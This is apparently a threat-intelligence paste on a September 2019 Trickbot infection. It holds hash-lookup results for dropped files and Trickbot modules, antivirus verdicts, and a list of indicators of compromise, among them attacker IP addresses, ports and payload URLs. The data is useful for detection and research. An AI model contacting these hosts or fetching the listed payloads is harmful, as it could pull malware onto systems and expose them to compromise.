HerbieZimmerman

2019-09-04 Trickbot GTAG:lleo3

Sep 5th, 2019
Artifacts
==========

Online Hash Checker for Virustotal and Other Services
Florian Roth - 0.13.0 April 2019

[+] Found results CSV from previous run: check-results_temp.csv
[+] Appending results to file: check-results_temp.csv
[ ] Processing e3615fc4b82979.bat ...
[ ] Processing c3b68665a5cb91b32fe4.bat ...
[ ] Processing Copy of Doc IAAN 17_871 INDV.doc ...
[ ] Processing AidaLogsRepors.exe ...
[ ] Processing c233be3634f987bc713a6148.bat ...
[+] Processing 5 lines ...

1 / 5 > Clean
HASH: c43ebd26c8ca084d5e2c71d58a9a76a791080d3c0101e20631d2a0b922f1b039 COMMENT:e3615fc4b82979.bat
TYPE: - FILENAMES: -
FIRST: - LAST: 2019-09-03 00:39:24 COMMENTS: 0 USERS: -
RESULT: 0 / 56

2 / 5 > Unknown
HASH: aa981df19422808f263341cd6229168425078c083723ac965954903368e68c79 COMMENT:c3b68665a5cb91b32fe4.bat
RESULT: - / -

3 / 5 > Suspicious
HASH: 60c185630ac0713341bf4f3750bacc66505d151508903f519b6152592bbecb12 COMMENT:Copy of Doc IAAN 17_871 INDV.doc
VIRUS: TrendMicro: HEUR_VBA.O2
TYPE: - FILENAMES: -
FIRST: - LAST: 2019-09-04 19:34:26 COMMENTS: 0 USERS: -
RESULT: 6 / 60

4 / 5 > Malicious
HASH: 89ed8f11cd5aca84c8eaaeb7120aea6392d22757bce542f827b0c4861da09661 COMMENT:AidaLogsRepors.exe
VIRUS: Kaspersky: UDS:DangerousObject.Multi.Generic / CrowdStrike: win/malicious_confidence_80% (D)
TYPE: - FILENAMES: -
FIRST: - LAST: 2019-09-04 19:43:40 COMMENTS: 0 USERS: -
RESULT: 13 / 70

5 / 5 > Unknown
HASH: 29e45959c675394ca061b9adcab09c49682ee44a657c25494c00639f8d5c78c2 COMMENT:c233be3634f987bc713a6148.bat
RESULT: - / -

-----
[+] Writing results to new file: check-results_MsCloud.csv
[ ] Processing 2019-09-04-trickbot/MsCloud/AidaNqguTerqtu.exe ...
[ ] Processing 2019-09-04-trickbot/MsCloud/settings.ini ...
[ ] Processing 2019-09-04-trickbot/MsCloud/data/mailsearcher64 ...
[ ] Processing 2019-09-04-trickbot/MsCloud/data/importDll64 ...
[ ] Processing 2019-09-04-trickbot/MsCloud/data/systeminfo64 ...
[ ] Processing 2019-09-04-trickbot/MsCloud/data/networkDll64 ...
[ ] Processing 2019-09-04-trickbot/MsCloud/data/psfin64 ...
[ ] Processing 2019-09-04-trickbot/MsCloud/data/injectDll64 ...
[ ] Processing 2019-09-04-trickbot/MsCloud/data/pwgrab64 ...
[ ] Processing 2019-09-04-trickbot/MsCloud/data/psfin64_configs/dpost ...
[ ] Processing 2019-09-04-trickbot/MsCloud/data/pwgrab64_configs/dpost ...
[ ] Processing 2019-09-04-trickbot/MsCloud/data/mailsearcher64_configs/mailconf ...
[ ] Processing 2019-09-04-trickbot/MsCloud/data/injectDll64_configs/dinj ...
[ ] Processing 2019-09-04-trickbot/MsCloud/data/injectDll64_configs/sinj ...
[ ] Processing 2019-09-04-trickbot/MsCloud/data/injectDll64_configs/dpost ...
[ ] Processing 2019-09-04-trickbot/MsCloud/data/networkDll64_configs/dpost ...
[+] Processing 16 lines ...

1 / 16 > Malicious
HASH: 89ed8f11cd5aca84c8eaaeb7120aea6392d22757bce542f827b0c4861da09661 COMMENT: 2019-09-04-trickbot/MsCloud/AidaNqguTerqtu.exe
VIRUS: Microsoft: Trojan:Win32/Zpevdo.A / Kaspersky: Trojan.Win32.Inject.amcbj / McAfee: Artemis!64EBC09F3249 / CrowdStrike: win/malicious_confidence_80% (W) / TrendMicro: TROJ_FRS.VSNW04I19 / ESET-NOD32: a variant of Win32/GenKryptik.DSDJ / Symantec: ML.Attribute.HighConfidence / GData: Win32.Trojan-Spy.TrickBot.DNLMNN
TYPE: - FILENAMES: -
FIRST: - LAST: 2019-09-05 13:14:12 COMMENTS: 0 USERS: -
RESULT: 24 / 67
[!] Sample on CAPE sandbox URL: https://cape.contextis.com/analysis/90022/
[!] Sample on CAPE sandbox URL: https://cape.contextis.com/analysis/90021/

2 / 16 > Unknown
HASH: 42f15e9c3a5a98d94608d69aacc5790d14345c768e07cba2f6fdc094470a5c4e COMMENT: 2019-09-04-trickbot/MsCloud/settings.ini
RESULT: - / -

3 / 16 > Unknown
HASH: d390162edc8698fe765bc6ba2cfe772abad55c74259782a2991f3fe5e9955a62 COMMENT: 2019-09-04-trickbot/MsCloud/data/mailsearcher64
RESULT: - / -

4 / 16 > Unknown
HASH: da9896abed6fca8ca751397adfe6268abbf56114c0f1dd74d041e28dfe0488ad COMMENT: 2019-09-04-trickbot/MsCloud/data/importDll64
RESULT: - / -

5 / 16 > Unknown
HASH: 8dcfbc19e08942458f83cbc3cfe16b0ede15225860e1516dd2aa132bebd0fbcb COMMENT: 2019-09-04-trickbot/MsCloud/data/systeminfo64
RESULT: - / -

6 / 16 > Unknown
HASH: 9ba4c3fe3a95a321489bb8238106ea9734a3168822d7fc3f7c2946eea228115c COMMENT: 2019-09-04-trickbot/MsCloud/data/networkDll64
RESULT: - / -

7 / 16 > Unknown
HASH: 83c45927624559a1609e2d02e98bafe67ac3de3e1ac5ee16255aa3a705569551 COMMENT: 2019-09-04-trickbot/MsCloud/data/psfin64
RESULT: - / -

8 / 16 > Unknown
HASH: 47d4d32e2dcb832793c439a44cff8da5ef0720961f925ef55ca0c7543c9c3b2e COMMENT: 2019-09-04-trickbot/MsCloud/data/injectDll64
RESULT: - / -

9 / 16 > Unknown
HASH: 49660580b1f3b845a8f064095761dad5b96332a27d093965f633c6257706cc83 COMMENT: 2019-09-04-trickbot/MsCloud/data/pwgrab64
RESULT: - / -

10 / 16 > Unknown
HASH: 2d8cfe87c00d2b16fbaa8c0cd46ee12d1a0d6dc2e31d0347957c55986b07aabb COMMENT: 2019-09-04-trickbot/MsCloud/data/psfin64_configs/dpost
RESULT: - / -

11 / 16 > Unknown
HASH: 2d8cfe87c00d2b16fbaa8c0cd46ee12d1a0d6dc2e31d0347957c55986b07aabb COMMENT: 2019-09-04-trickbot/MsCloud/data/pwgrab64_configs/dpost
RESULT: - / -

12 / 16 > Unknown
HASH: e6aa9d48dff040faa558781adc3f04398807d0c8fd275861252886b283c2f627 COMMENT: 2019-09-04-trickbot/MsCloud/data/mailsearcher64_configs/mailconf
RESULT: - / -

13 / 16 > Unknown
HASH: 7c5bb67e5a1c2b6f8755d8e52bc5983b1551b45738731f69b08f86768d333845 COMMENT: 2019-09-04-trickbot/MsCloud/data/injectDll64_configs/dinj
RESULT: - / -

14 / 16 > Unknown
HASH: c7bf18b05cf9a333fbb1e8e54c55e93e2487a1a8987d0264fd3804c2267b8ebd COMMENT: 2019-09-04-trickbot/MsCloud/data/injectDll64_configs/sinj
RESULT: - / -

15 / 16 > Unknown
HASH: 2d8cfe87c00d2b16fbaa8c0cd46ee12d1a0d6dc2e31d0347957c55986b07aabb COMMENT: 2019-09-04-trickbot/MsCloud/data/injectDll64_configs/dpost
RESULT: - / -

16 / 16 > Unknown
HASH: 2d8cfe87c00d2b16fbaa8c0cd46ee12d1a0d6dc2e31d0347957c55986b07aabb COMMENT: 2019-09-04-trickbot/MsCloud/data/networkDll64_configs/dpost
RESULT: - / -

IOCs
=====
162.241.218.208 / repgqo.com/Ileo3.bmp
116.203.16.95 / ip.anysrc.net
200.119.45.140:449 (TCP)
194.5.250.115:447 (TCP)
170.238.117.187:8082 (POST/TCP)
104.168.98.206 (GET /tablone.png)
104.168.98.206 (GET /samerton.png)

Interesting strings from svchost.exe process
==============================================